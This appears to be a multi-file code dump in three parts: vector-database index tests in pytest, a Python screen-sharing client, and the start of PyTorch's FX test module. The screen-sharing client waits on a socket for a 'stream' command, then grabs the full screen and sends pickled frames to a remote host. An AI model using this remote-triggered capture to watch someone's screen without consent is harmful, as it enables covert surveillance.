assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition_C(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection, create partitions and add vectors in it, create index on partitions, call drop partition index
expected: return code 0, and default index param
'''
new_tag = "new_tag"
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_partition(ip_collection, tag)
status = connect.create_partition(ip_collection, new_tag)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_repeatly(self, connect, ip_collection, get_simple_index):
'''
target: test drop index repeatly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(ip_collection, vectors)
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
# @pytest.mark.level(2)
# def test_drop_index_without_connect(self, dis_connect, ip_collection):
# '''
# target: test drop index without connection
# method: drop index, and check if drop successfully
# expected: raise exception
# '''
# nlist = NLIST
# index_type = IndexType.IVFLAT
# index_param = {"nlist": nlist}
# with pytest.raises(Exception) as e:
# status = dis_connect.drop_index(ip_collection, index_type, index_param)
def test_drop_index_collection_not_create(self, connect, ip_collection):
'''
target: test drop index interface when index not created
method: create collection and add vectors in it, create index
expected: return code not equals to 0, drop index failed
'''
status, ids = connect.add_vectors(ip_collection, vectors)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(ip_collection)
logging.getLogger().info(status)
assert status.OK()
@pytest.mark.level(2)
def test_create_drop_index_repeatly(self, connect, ip_collection, get_simple_index):
'''
target: test create / drop index repeatly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(ip_collection, vectors)
for i in range(2):
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, ip_collection):
'''
target: test create / drop index repeatly, use the different index params
method: create index, drop index, four times, each tme use different index_params to create index
expected: return code 0
'''
nlist = NLIST
indexs = [{"index_type": IndexType.IVFLAT, "index_param": {"nlist": nlist}}, {"index_type": IndexType.IVF_SQ8, "index_param": {"nlist": nlist}}]
status, ids = connect.add_vectors(ip_collection, vectors)
for i in range(2):
status = connect.create_index(ip_collection, indexs[i]["index_type"], indexs[i]["index_param"])
assert status.OK()
status, result = connect.describe_index(ip_collection)
assert result._params == indexs[i]["index_param"]
assert result._collection_name == ip_collection
assert result._index_type == indexs[i]["index_type"]
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
class TestIndexJAC:
tmp, vectors = gen_binary_vectors(nb, dim)
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status, ids = connect.add_vectors(jac_collection, self.vectors)
status = connect.create_index(jac_collection, index_type, index_param)
if index_type != IndexType.FLAT and index_type != IndexType.IVFLAT:
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status = connect.create_partition(jac_collection, tag)
status, ids = connect.add_vectors(jac_collection, self.vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
# @pytest.mark.level(2)
# def test_create_index_without_connect(self, dis_connect, jac_collection):
# '''
# target: test create index without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nlist = NLIST
# index_param = {"nlist": nlist}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_index(jac_collection, IndexType.IVF_SQ8, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status, ids = connect.add_vectors(jac_collection, self.vectors)
status = connect.create_index(jac_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(jac_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(jac_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
# status, ids = connect.add_vectors(jac_collection, vectors[:5000])
status = connect.create_index(jac_collection, index_type, index_param)
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
logging.getLogger().info(get_jaccard_index)
status = connect.create_partition(jac_collection, tag)
status, ids = connect.add_vectors(jac_collection, vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == jac_collection
assert result._index_type == index_type
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
status = connect.drop_index(jac_collection)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, jac_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
index_param = get_jaccard_index["index_param"]
index_type = get_jaccard_index["index_type"]
status = connect.create_partition(jac_collection, tag)
status, ids = connect.add_vectors(jac_collection, vectors, partition_tag=tag)
status = connect.create_index(jac_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
status = connect.drop_index(jac_collection)
assert status.OK()
status, result = connect.describe_index(jac_collection)
logging.getLogger().info(result)
assert result._collection_name == jac_collection
assert result._index_type == IndexType.FLAT
class TestIndexBinary:
tmp, vectors = gen_binary_vectors(nb, dim)
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if request.param["index_type"] == IndexType.IVF_PQ or request.param["index_type"] == IndexType.HNSW:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if request.param["index_type"] == IndexType.IVF_PQ or request.param["index_type"] == IndexType.HNSW:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status, ids = connect.add_vectors(ham_collection, self.vectors)
status = connect.create_index(ham_collection, index_type, index_param)
if index_type != IndexType.FLAT and index_type != IndexType.IVFLAT:
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status = connect.create_partition(ham_collection, tag)
status, ids = connect.add_vectors(ham_collection, self.vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, res = connect.count_collection(ham_collection)
assert res == len(self.vectors)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_structure(self, connect, substructure_collection, get_substructure_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_substructure_index["index_param"]
index_type = get_substructure_index["index_type"]
logging.getLogger().info(get_substructure_index)
status = connect.create_partition(substructure_collection, tag)
status, ids = connect.add_vectors(substructure_collection, self.vectors, partition_tag=tag)
status = connect.create_index(substructure_collection, index_type, index_param)
assert status.OK()
status, res = connect.count_collection(substructure_collection,)
assert res == len(self.vectors)
# @pytest.mark.level(2)
# def test_create_index_without_connect(self, dis_connect, ham_collection):
# '''
# target: test create index without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nlist = NLIST
# index_param = {"nlist": nlist}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_index(ham_collection, IndexType.IVF_SQ8, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status, ids = connect.add_vectors(ham_collection, self.vectors)
status = connect.create_index(ham_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(ham_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(ham_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_superstructure(self, connect, superstructure_collection, get_superstructure_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_superstructure_index["index_param"]
index_type = get_superstructure_index["index_type"]
logging.getLogger().info(get_superstructure_index)
status, ids = connect.add_vectors(superstructure_collection, self.vectors)
status = connect.create_index(superstructure_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(superstructure_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(superstructure_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, ham_collection, get_hamming_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
# status, ids = connect.add_vectors(jac_collection, vectors[:5000])
status = connect.create_index(ham_collection, index_type, index_param)
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status = connect.create_partition(ham_collection, tag)
status, ids = connect.add_vectors(ham_collection, vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ham_collection
assert result._index_type == index_type
def test_describe_index_partition_superstructrue(self, connect, superstructure_collection, get_superstructure_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_superstructure_index["index_param"]
index_type = get_superstructure_index["index_type"]
logging.getLogger().info(get_superstructure_index)
status = connect.create_partition(superstructure_collection, tag)
status, ids = connect.add_vectors(superstructure_collection, vectors, partition_tag=tag)
status = connect.create_index(superstructure_collection, index_type, index_param)
status, result = connect.describe_index(superstructure_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == superstructure_collection
assert result._index_type == index_type
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, ham_collection, get_hamming_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
status = connect.drop_index(ham_collection)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_substructure(self, connect, substructure_collection, get_substructure_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_substructure_index["index_param"]
index_type = get_substructure_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
status = connect.create_index(substructure_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(substructure_collection)
logging.getLogger().info(result)
status = connect.drop_index(substructure_collection)
assert status.OK()
status, result = connect.describe_index(substructure_collection)
logging.getLogger().info(result)
assert result._collection_name == substructure_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
status = connect.create_partition(ham_collection, tag)
status, ids = connect.add_vectors(ham_collection, vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
status = connect.drop_index(ham_collection)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == IndexType.FLAT
class TestIndexCollectionInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(1)
def test_create_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
nlist = NLIST
index_param = {"nlist": nlist}
status = connect.create_index(collection_name, IndexType.IVF_SQ8, index_param)
assert not status.OK()
@pytest.mark.level(1)
def test_describe_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
status, result = connect.describe_index(collection_name)
assert not status.OK()
@pytest.mark.level(1)
def test_drop_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
status = connect.drop_index(collection_name)
assert not status.OK()
class TestCreateIndexParamsInvalid(object):
"""
Test Building index with invalid collection names, collection names not in db
"""
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.level(1)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
index_param = get_index["index_param"]
index_type = get_index["index_type"]
logging.getLogger().info(get_index)
# status, ids = connect.add_vectors(collection, vectors)
if (not index_type) or (not isinstance(index_type, IndexType)):
with pytest.raises(Exception) as e:
status = connect.create_index(collection, index_type, index_param)
else:
status = connect.create_index(collection, index_type, index_param)
assert not status.OK()
"""
Test Building index with invalid nlist
"""
@pytest.fixture(
scope="function",
params=[IndexType.FLAT,IndexType.IVFLAT,IndexType.IVF_SQ8,IndexType.IVF_SQ8H]
)
def get_index_type(self, request):
yield request.param
def test_create_index_with_invalid_nlist(self, connect, collection, get_index_type):
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, get_index_type, {"nlist": INVALID_NLIST})
if get_index_type != IndexType.FLAT:
assert not status.OK()
'''
Test Building index with empty params
'''
def test_create_index_with_empty_param(self, connect, collection, get_index_type):
logging.getLogger().info(get_index_type)
status = connect.create_index(collection, get_index_type, {})
if get_index_type != IndexType.FLAT :
assert not status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
class TestIndexAsync:
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
# if request.param["index_type"] == IndexType.IVF_PQ:
if request.param["index_type"] not in [IndexType.IVF_FLAT]:
# pytest.skip("ivfpq not support in GPU mode")
pytest.skip("debug ivf_flat in GPU mode")
return request.param
def check_status(self, status):
logging.getLogger().info("In callback check status")
assert status.OK()
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
vectors = gen_vectors(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
logging.getLogger().info("start index")
# future = connect.create_index(collection, index_type, index_param, _async=True, _callback=self.check_status)
future = connect.create_index(collection, index_type, index_param, _async=True)
logging.getLogger().info("before result")
status = future.result()
assert status.OK()
def test_create_index_with_invalid_collectionname(self, connect):
collection_name = " "
nlist = NLIST
index_param = {"nlist": nlist}
future = connect.create_index(collection_name, IndexType.IVF_SQ8, index_param, _async=True)
status = future.result()
assert not status.OK()
|
streamingClient.py
|
import threading
import cv2
import pickle
import struct
import numpy as np
import socket
from PIL import ImageGrab
class StreamingClient:
"""
Abstract class for the generic streaming client.
Attributes
----------
Private:
__host : str
host address to connect to
__port : int
port to connect to
__running : bool
inicates if the client is already streaming or not
__encoding_parameters : list
a list of encoding parameters for OpenCV
__client_socket : socket
the main client socket
Methods
-------
Private:
__client_streaming : main method for streaming the client data
Protected:
_configure : sets basic configurations (overridden by child classes)
_get_frame : returns the frame to be sent to the server (overridden by child classes)
_cleanup : cleans up all the resources and closes everything
Public:
start_stream : starts the client stream in a new thread
"""
def __init__(self, host, port, clientSocket):
"""
Creates a new instance of StreamingClient.
Parameters
----------
host : str
host address to connect to
port : int
port to connect to
"""
self.__host = host
self.__port = port
self._configure()
self.__running = False
#client socket to recv request
self.__client = clientSocket
# client socket to recv video
self.__client_socket = None
def startListening(self):
request = ""
while True:
request = self.__client.recv(1024).decode("utf-8")
if not request:
break
if request == "stream":
self.start_stream()
elif request == "stop":
self.stop_stream()
else:
return
def _configure(self):
"""
Basic configuration function.
"""
self.__encoding_parameters = [int(cv2.IMWRITE_JPEG_QUALITY), 90]
def _get_frame(self):
"""
Basic function for getting the next frame.
Returns
-------
frame : the next frame to be processed (default = None)
"""
return None
def _cleanup(self):
"""
Cleans up resources and closes everything.
"""
cv2.destroyAllWindows()
def __client_streaming(self):
"""
Main method for streaming the client data.
"""
self.__client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__client_socket.connect((self.__host, self.__port))
while self.__running:
frame = self._get_frame()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
result, frame = cv2.imencode('.jpg', frame, self.__encoding_parameters)
data = pickle.dumps(frame, 0)
size = len(data)
try:
self.__client_socket.send(struct.pack('>L', size) + data)
except:
self.__running = False
self._cleanup()
def start_stream(self):
"""
Starts client stream if it is not already running.
"""
if self.__running:
print("Client is already streaming!")
else:
self.__running = True
client_thread = threading.Thread(target=self.__client_streaming)
client_thread.start()
def stop_stream(self):
"""
Stops client stream if running
"""
try:
self.__client_socket.close()
except:
pass
if self.__running:
self.__running = False
else:
print("Client not streaming!")
class ScreenShareClient(StreamingClient):
"""
Class for the screen share streaming client.
Attributes
----------
Private:
__host : str
host address to connect to
__port : int
port to connect to
__running : bool
inicates if the client is already streaming or not
__encoding_parameters : list
a list of encoding parameters for OpenCV
__client_socket : socket
the main client socket
__x_res : int
the x resolution
__y_res : int
the y resolution
Methods
-------
Protected:
_get_frame : returns the screenshot frame to be sent to the server
Public:
start_stream : starts the screen sharing stream in a new thread
"""
def __init__(self, host, port, clientSocket, x_res=1024, y_res=576):
"""
Creates a new instance of ScreenShareClient.
Parameters
----------
host : str
host address to connect to
port : int
port to connect to
x_res : int
the x resolution
y_res : int
the y resolution
"""
self.__x_res = x_res
self.__y_res = y_res
super(ScreenShareClient, self).__init__(host, port, clientSocket)
def _get_frame(self):
"""
Gets the next screenshot.
Returns
-------
frame : the next screenshot frame to be processed
"""
screen = ImageGrab.grab() #pyautogui.screenshot()
frame = np.array(screen)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (self.__x_res, self.__y_res), interpolation=cv2.INTER_AREA)
return frame
#a = ScreenShareClient("localhost", 5000)
#a.start_stream()
|
test_fx.py
|
# Owner(s): ["oncall: fx"]
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH, CodeGen
from torch.fx.node import Target, Argument, _format_arg
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
def wrapped_named_tup(p1, *, p2):
return p1.x + p2.y
wrap(wrapped_named_tup)
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
def _custom_fx_repr_fn(self) -> str:
return f"Pair(x={_format_arg(self.x)}, y={_format_arg(self.y)})"
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
